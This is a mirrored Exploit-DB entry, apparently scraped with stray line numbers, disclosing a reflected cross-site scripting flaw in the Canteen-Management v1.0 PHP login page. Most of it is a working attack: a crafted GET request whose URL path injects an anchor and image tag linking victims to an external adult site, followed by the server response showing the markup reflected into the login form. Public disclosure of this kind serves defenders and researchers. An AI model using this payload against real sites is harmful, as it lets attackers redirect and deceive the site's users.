Canteen-Management v1.0 – XSS-Reflected

Exploit Database
140 阅读

作者： nu11secur1ty

日期： 2023-03-27
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/51062/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

## Exploit Title: Canteen-Management v1.0 - XSS-Reflected

## Exploit Author: nu11secur1ty

## Date: 10.04.2022

## Vendor:Free PHP Projects & Ideas with Source Codes for Students |

mayurik <https://www.mayurik.com/>

## Software:

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs

## Reference:

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

## Description:

The name of an arbitrarily supplied URL parameter is copied into the value

of an HTML tag attribute which is encapsulated in double quotation marks.

The attacker can craft a very malicious HTTPS URL redirecting to a very

malicious URL. When the victim clicks into this crafted URL the game will

over for him.

[+]Payload REQUEST:

</code><code>HTML

GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22

https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me

HTTP/1.1

Host: pwnedhost.com

Accept-Encoding: gzip, deflate

Accept:

text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Language: en-US;q=0.9,en;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

(KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36

Connection: close

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106",

"Chromium";v="106"

Sec-CH-UA-Platform: Windows

Sec-CH-UA-Mobile: ?0

</code><code>

[+]Payload RESPONSE:

</code><code>burp

HTTP/1.1 200 OK

Date: Tue, 04 Oct 2022 09:44:55 GMT

Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6

X-Powered-By: PHP/8.1.6

Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 6140

Connection: close

Content-Type: text/html; charset=UTF-8

<style>

.footer1 {

position: fixed;

bottom: 0;

width: 100%;

color: #5c4ac7;

text-align: center;

}

</style>

<!DOCTYPE html>

<head>

user-scalable=0, minimal-ui">

href="https://www.exploit-db.com/exploits/51062/assets/uploadImage/Logo/favicon.png">

@media print {

#printbtn {

display :none;

}

</style>

<title>Youthappam Canteen Management System - by Mayuri K.

Freelancer</title>

rel="stylesheet">

href="https://www.exploit-db.com/exploits/51062/assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />

rel="stylesheet">

rel="stylesheet">

https://www.gstatic.com/charts/loader.js"></script>

google.charts.load("current", {packages:["corechart"]});

google.charts.setOnLoadCallback(drawChart);

function drawChart() {

var data = google.visualization.arrayToDataTable([

['Food', 'Average sale per Day'],

['Masala dosa', 11],

['Chicken 65 ',2],

['Karapu Boondi',2],

['Bellam Gavvalu', 2],

['Gummadikaya Vadiyalu',7]

]);

var options = {

title: 'Food Average Sale per Day',

pieHole: 0.4,

};

var chart = new

google.visualization.PieChart(document.getElementById('donutchart'));

chart.draw(data, options);

}

</script>

</head>

<div class="container-fluid" style="background-image:

url('assets/myimages/background.jpg');

background-color: #ffffff;background-size:cover">

<center><img

src="https://www.exploit-db.com/exploits/51062/assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>

<form

action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"

target="_blank" rel="noopener nofollow ugc"> <img src="https:/

raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"

method="post" id="loginForm">

<input type="text" name="username"

id="username" class="form-control" placeholder="Username" required="">

</div>

<input type="password"

id="password" name="password" class="form-control" placeholder="Password"

required="">

</div>

<button type="submit" name="login"

class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>

<!-- <div class="forgot-phone text-right

f-right">

<a href="https://www.exploit-db.com/exploits/51062/#" class="text-right f-w-600"> Forgot Password?</a>

</div> -->

<a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development

Requirement&body = I saw your projects. I want to develop a project"

class="text-right f-w-600"> Click here to contact me</a>

</div>

</form>

</div>

<script

src="https://www.exploit-db.com/exploits/51062/assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>

function onReady(callback) {

var intervalID = window.setInterval(checkReady, 1000);

function checkReady() {

if (document.getElementsByTagName('body')[0] !== undefined) {

window.clearInterval(intervalID);

callback.call(this);

}

function show(id, value) {

document.getElementById(id).style.display = value ? 'block' : 'none';

}

onReady(function () {

show('page', true);

show('loading', false);

});

</script>

</body>

</html>

</code><code>

## Reproduce:

[href](

https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management

)

## Proof and Exploit:

[href](https://streamable.com/emg0zo)

System Administrator - Infrastructure Engineer

Penetration Testing Engineer

Exploit developer at https://packetstormsecurity.com/

https://cve.mitre.org/index.html and https://www.exploit-db.com/

home page: https://www.nu11secur1ty.com/

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=

nu11secur1ty <http://nu11secur1ty.com/>